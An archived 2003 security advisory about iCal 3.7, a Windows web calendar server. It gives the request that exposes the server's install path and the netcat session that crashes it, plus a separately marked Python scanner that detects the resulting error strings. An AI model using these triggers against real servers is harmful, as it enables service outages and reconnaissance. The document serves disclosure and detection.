[NT] iCal Remote DoS and Path Disclosure

From: support@securiteam.com
Date: 01/05/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 5 Jan 2003 12:03:00 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      iCal Remote DoS and Path Disclosure
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.brownbearsw.com> iCal is a web calendar server for
    Microsoft Windows. It can be used to show meetings, events, or other
    schedules. Calendars can be viewed, edited, and administered entirely
    through the web. iCal is built for thin clients, so calendars can be
    accessed without any plug-ins or Java interpreters. Two vulnerabilities
    in the product allow remote attackers to reveal the true path used on the
    server and to cause the server to crash.

    DETAILS

    Vulnerable systems:
     * iCal version 3.7

    Path disclosure:
    Accessing http://target/*
    will return the following error message:
    Unable to write to D:\program files\iCl 3.7 Web Calendar\*.cal

    Denial of service:
    Connecting using "nc target 80" and then sending:
     AAAA
    [ And pressing enter ]

    Will return an error message:
    Access violation at address 00403d8b in module 'ICAL.EXE' Read of address
    0161c1af
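
As an added example (not part of the original advisory and not the vendor's code), a passive check that flags the two error strings quoted above when they appear in captured HTTP response bodies, such as proxy or scanner logs. The function names, the sample bodies and the inclusion of a "Write" variant of the fault message are assumptions made for illustration.

```python
import re

# Absolute Windows path (drive letter + backslash), as leaked by the
# "Unable to write to ..." error quoted in the advisory.
WIN_PATH = re.compile(r'\b[A-Za-z]:\\(?:[^\\/:"<>|\r\n]+\\)*[^\\/:"<>|\r\n]*')

# Access-violation banner of the form quoted in the advisory. Whitespace is
# matched loosely because such messages get re-wrapped in mail and logs.
# Assumption: the "Write" variant is accepted alongside the quoted "Read".
CRASH = re.compile(
    r"Access violation at address ([0-9A-Fa-f]{8}) in module\s*'([^']+)'"
    r"\W+(Read|Write) of address\s+([0-9A-Fa-f]{8})"
)

def scan_response(body):
    """Return findings for one HTTP response body as (kind, detail) tuples."""
    findings = []
    for m in WIN_PATH.finditer(body):
        findings.append(("path-disclosure", m.group(0).strip()))
    m = CRASH.search(body)
    if m:
        fault, module, access, target = m.groups()
        findings.append(("crash-banner", {
            "module": module, "fault_addr": fault.lower(),
            "access": access, "target_addr": target.lower(),
        }))
    return findings

# Constructed sample bodies; the two error strings are the ones in the advisory.
SAMPLES = {
    "/*": r"Unable to write to D:\program files\iCl 3.7 Web Calendar\*.cal",
    "(malformed request)": "Access violation at address 00403d8b in "
                           "module'ICAL.EXE' Read of address\n0161c1af",
    "/calendar": "<html><body>Schedule for January 2003</body></html>",
}

def scan_all(samples):
    """Map each request label to its findings, dropping clean responses."""
    scanned = ((req, scan_response(body)) for req, body in samples.items())
    return {req: found for req, found in scanned if found}

if __name__ == "__main__":
    for req, found in scan_all(SAMPLES).items():
        for kind, detail in found:
            print(f"{req}: {kind}: {detail}")
```

A path-disclosure hit shows the server's install directory is being echoed to clients; a crash-banner hit means the service faulted while handling a request and should be checked for availability.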

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:securma@caramail.com>
    securma massine.

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


